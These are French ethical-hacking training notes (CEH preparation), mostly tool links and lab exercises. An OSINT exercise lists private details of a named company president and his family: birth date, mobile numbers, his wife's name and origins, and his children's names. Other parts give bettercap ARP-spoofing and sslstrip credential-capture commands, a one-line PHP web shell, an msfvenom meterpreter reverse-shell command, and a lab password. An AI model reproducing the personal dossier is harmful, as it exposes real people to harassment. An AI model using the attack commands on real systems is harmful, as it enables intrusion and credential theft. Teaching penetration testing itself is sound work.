Formation Ethical Hacking

Module 01 : Introduction Ethical Hacking

Mitre ATTACK : https://attack.mitre.org/ CVE : https://www.cvedetails.com CVSS calculator : https://www.first.org/cvss/calculator/3.0

Cap'n Crunch (John Draper) : https://fr.wikipedia.org/wiki/John_Draper

La loi Lopmi indiquant du paiment de la rançon en cas de cyber-attaque https://www.vie-publique.fr/loi/284424-loi-24-janvier-2023-securite-lopmi-programmation-ministere-interieur https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000047046768 Extrait intéressant : Pour une meilleure information de la police et de la justice, les clauses de remboursement des cyber-rançons par les assurances sont encadrées. Le remboursement est désormais conditionné au dépôt d'une plainte de la victime dans les 72h après connaissance de l'infraction. Les parlementaires ont prévu que l'obligation soit limitée aux professionnels et qu'elle s'applique à partir du 24 avril 2023. L'assurabilité sous conditions des cyber-rançons est une recommandation du ministère de l'économie, figurant dans son rapport sur "le développement de l'assurance du risque cyber".

Fiches de réponses à incidents : https://github.com/certsocietegenerale/IRM/tree/master/EN

Module 02 : Reconnaissance

Fuites de mots de passe : https://haveibeenpwned.com/ Google dork/hack https://www.exploit-db.com/google-hacking-database

Google Hackiog automatisé : https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan/blob/master/FGDS.sh https://github.com/trhacknon/GooFuzz

Recherche de buckets AWS, Azure Gray Hat Warfare : https://buckets.grayhatwarfare.com/

Moteur de recherche du RIPE (adresses IP en Europe)

Enumeration DNS :

Vérifier qu'un email est enregistré sur un site : https://github.com/megadose/holehe https://epieos.com/

Un copain de sherlock que j'utilise beaucoup : https://github.com/soxoj/maigret

p0f : prise d'information réseau passive

identifier des emails valides sur un domaine : theHarvester Outils de campagnes de phishing :

TTL par OS : https://subinsb.com/default-device-ttl-values/ TL;DR : 128 = Windows (majorité des cas) 64 = Linux (majorité des cas) Note : Majorité des cas = de mon éxperience sur 3/4 ans de pentest

Contrôle adresses emails : Capency (anciennement CapAdress) Utilise les réponses SMTP hardbounce : https://www.mindbaz.com/technologie-email/bounces-email/

Annuaires de sites OSINT: https://goosint.com/ https://osintframework.com/

TP Prise d'informations

  1. Quel est le nom du président de la société Wallix ? Jean-Noël De Galzain (Google)
  2. Quelle est l’adresse postale de la société ? 250 bis Rue du Faubourg Saint-Honoré, 75008 Paris (Google)
  3. Quelle est la date de naissance du président ? 3 juin 1971 (Copains d'avant ou verif.com)
  4. Quel est son numéro de téléphone portable ? +33 6 32 64 34 34 (jean noel de galzain telephone sur Google ou WHOIS sur degalzain.com identifié via Twitter)
  5. Quel est le prénom de sa femme ? Gabrielle (via archive.org sur www.degalzain.com) intext:"jean noël de galzain" intext:domicile
  6. Combien a-t-il d’enfant·s ? S’il en a, quel·s est/sont le·s prénom·s ? Louis (via archive.org sur www.degalzain.com) Vladimir (via pappers.fr et statuts de la société Gabji, on obtient les enfants et leurs dates de naissance)
  7. Quelle est l’adresse email de sa femme ? Son numéro de téléphone portable ?
    • 33 6 08 32 52 70 (via Google en tapant : "gabriella ponjavic" "06") Bonus : Origines de sa femme et ville de naissance Bosnie-Herzegovine / Tuzla (via pappers.fr dans les statuts de la société Gabji)

Module 03 : Scanning Networks

Machine LAMPSec5

patrick : ne1410s

TP Nmap

Cible : LAMPSec5

  1. Effectuez un SYN scan sur la machine cible
  2. Quelles sont les options qui permettent d'accélérer une analyse ?
  3. Quelle est la différence entre un SYN scan et un scan TCP Connect ?
  4. Par défaut Nmap analyse-t-il tous les ports TCP ?
  5. Scannez tous les ports TCP de la machine
  6. Effectuez une détection de service
  7. Quelles sont les informations complémentaires qui ont pu être récupérées grâce à la détection de services ?
  8. Quelles sont les méthodes permettant de connaitre le système d'exploitation d'une machine ?
  9. Déterminez le système d'exploitation utilisé par la machine cible
  10. La détection du système d'exploitation est-elle fiable ?
  11. Effectuez une analyse complète de la machine cible (scan agressif)
  1. Quelles analyses ont été effectuées ?
  2. Qu'est-ce que NSE ?
  3. Effectuez une sortie de scan au format XML

Nmap T options : https://nmap.org/book/performance-timing-templates.html

Scans UDP : unicornscan

Je paratage un outil sympa : https://explainshell.com/explain?cmd=nmap+-PS

Outils pour forger des paquets cutoms : - scapy Tutos scapy : https://thepacketgeek.com/scapy/building-network-tools/

Vérifier leak d'une IP lors de l'utilisation de VPN/proxy : https://ipleak.net/

Module 08 : Sniffing

Sécuriser les échanges DNS

Récupération d'identifiants sur des flux non chiffrés

Attaquant : Kali avec bettercap Cible : Windows 10

Documentation bettercap : https://www.bettercap.org/

bettercap net.recon on net.probe on net.sniff on set arp.spoof.targets <IP> arp.spoof on

Puis se rendre sur login.ebiquity.com et s'identifier

Récupération d'identifiants sur des flux chiffrés

hsts peloading :

bettercap caplets.update set http.proxy.sslstrip true hstshijack/hstshijack set arp.spoof.targets <IP> arp.spoof on net.sniff on net.probe on

Module 13 : Hacking Webservers

DDoS : https://twitter.com/sehnaoui/status/858711356933111815

DDoS par amplification Cloudlare NTP : https://blog.cloudflare.com/technical-details-behind-a-400gbps-ntp-amplification-ddos-attack/ Mitel DDoS amplification : https://thehackernews.com/2022/03/hackers-abuse-mitel-devices-to-amplify.html TCP DDoS amplification : https://geneva.cs.umd.edu/papers/usenix-weaponizing-ddos.pdf https://thehackernews.com/2022/03/hackers-begin-weaponizing-tcp-middlebox.html SLP DDoS Amplification : https://thehackernews.com/2023/04/new-slp-vulnerability-could-let.html Plus gros DDoS de l'histoire :

Outil attaque mot de passe en ligne : Hydra, Medusa, patator Outil attaque mot de passe hors ligne : john the ripper, hashcat Outils d'énumeration de répertoires et de fichiers : dirbuster, dirb, wfuzz Outils d'attaques de serveurs Web : Nikto

Arachni-scanner passe la main : https://ecsypno.com/pages/arachni-web-application-security-scanner-framework => devient Codename SCNR, dispo uniquement sous Linux pour le moment et passe payant dans 193 jours

TP Attaques Web

Cheat Sheets SHELL https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Générateur de reverse shells : https://www.revshells.com/

Injection de commande sur téléphone IP : https://sysdream.com/injection-commandes-sur/ https://www.youtube.com/watch?v=MgMdvxb8ArA

 <?php
system($_GET["cmd"]);
?>

Feuilles de triche MySQL injection : https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

Bonus : casser les hashs (via Google, john ou hashcat) https://hashes.com/en/decrypt/hash

Benchs hashcat :

Résumé module 06 : System Hacking

Brute force d'empreintes digitales sur smartphones : https://www.it-connect.fr/android-bruteprint-une-technique-dattaque-par-brute-force-sur-le-lecteur-biometrique/#:~:text=Lorsque%20plusieurs%20empreintes%20digitales%20sont,l'appareil%20pendant%20plusieurs%20heures.?utm_content=cmp-true

Echange de clé Kerberos : https://commons.wikimedia.org/wiki/File:Kerberos-simple.svg?uselang=fr

Avantages Kerberos : - Session ==> allégé le trafic réseau - Chiffrement robuste ==> AES - Authentification mutuelle

Kerberos :

Module 07 : Malwares

Commande msfvenom pour générer un exécutable malveillant pour Windows :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_ATTAQUANT LPORT=4444 -f exe -o msf.exe

Doc Metasploit : https://www.offsec.com/metasploit-unleashed/

TP Metasploit

Cible : VM Metasploitable

Objectifs :

principales commandes msfconsole :

Module 16 : Hacking Wireless Networks

Achat matériel Wi-Fi : http://www.wifi-highpower.com/

Matériel attaques : https://shop.hak5.org/

KRACK attack : https://www.krackattacks.com/

Loi Brouillage : https://www.secutec.fr/blog/legislation_brouilleurs_france/ https://www.capital.fr/economie-politique/un-pere-de-famille-brouille-involontairement-les-ondes-de-son-village-1428349 https://www.20minutes.fr/insolite/2869351-20200924-royaume-uni-tout-village-perdait-connexion-internet-chaque-matin-cause-vieille-television https://achdr.over-blog.com/2022/08/les-enquetes-de-l-anfr-les-brouillages-ont-plus-d-un-tour-dans-leur-sac.html https://www.anfr.fr/accueil/

Exemple attaque par canaux auxiliaires : https://www.tau.ac.il/~tromer/acoustic/

How to Weaponize your Cat to Hack Neighbours' Wi-Fi Passwords : https://thehackernews.com/2014/08/how-to-weaponize-your-cat-to-hack-your_9.html https://thehackernews.com/2021/10/israeli-researcher-cracked-over-3500-wi.html

Attaque du PMKID : https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/

Gros dictionnaires de mots de passe : https://weakpass.com/download

Attaques sur WPA3 : https://wpa3.mathyvanhoef.com/

Bluetooth : http://large.stanford.edu/courses/2012/ph250/roth1/

Attaque Bluetooth Tesla : https://www.tomsguide.fr/tesla-une-vulnerabilite-du-bluetooth-permet-de-les-ouvrir-et-de-les-demarrer-a-distance/

Module 09 : Social Engineering

Ouvrages :

Outil de campagne de phishing : https://getgophish.com/

Action Discrète à Libé : https://www.dailymotion.com/video/x11htea

Labs

Liste perso : On web pentest :

Général :

Exams blancs

https://passemall.com/free-ceh-v11-practice-test https://ceh.cagy.org/ https://www.examtopics.com/exams/eccouncil/312-50v12/ https://github.com/ryh04x/CEH-Exam-Questions

CEH Guides : https://www.amazon.fr/Certified-Ethical-Hacker-Exam-Guide/dp/1264269943 (v11) Préparation notes https://github.com/a3cipher/CEH/ https://www.amazon.fr/Certified-Ethical-Practice-Questions-English-ebook/dp/B0C2FFWB1T/ (v12)

Liste outils CEH Pratical : https://runmodule.com/2020/12/13/tools-for-ceh-practical/

https://www.amazon.fr/CEHv12-Certified-Ethical-Hacker-Notes/dp/B0BSY4T5QJ/ref=sr_1_9?__mk_fr_FR=%C3%85M%C3%85%C5%BD%C3%95%C3%91&crid=6422CERODB6Z&keywords=ceh+v12&qid=1684856986&sprefix=ceh+v12%2Caps%2C853&sr=8-9

http://eprints.binadarma.ac.id/1000/1/KEAMANAN%20SISTEM%20INFORMASI%20MATERI%201.pdf (v10?) https://cybersecurityhoy.files.wordpress.com/2021/07/ceh-certified-ethical-hacker-practice-exams-fourth-edition.pdf (v10) https://yeahhub.com/cehv9-practice-exam-questions/chapter0-assessment.php

Avis sur cette technologie et sa robustesse Privacy-preserving computation techniques

Pour le pentest web : https://owasp.org/www-project-web-security-testing-guide/v42/ Sert globalement de checklist sur les tests a réaliser sur des webapp

Meilleure source pour le pentest AD https://zer1t0.gitlab.io/posts/attacking_ad/ Et pour la méthode : https://github.com/esidate/pentesting-active-directory

L'affaire KIA :


Revision #2
Created 26 June 2023 08:06:11 by Makito
Updated 26 June 2023 12:12:16 by Makito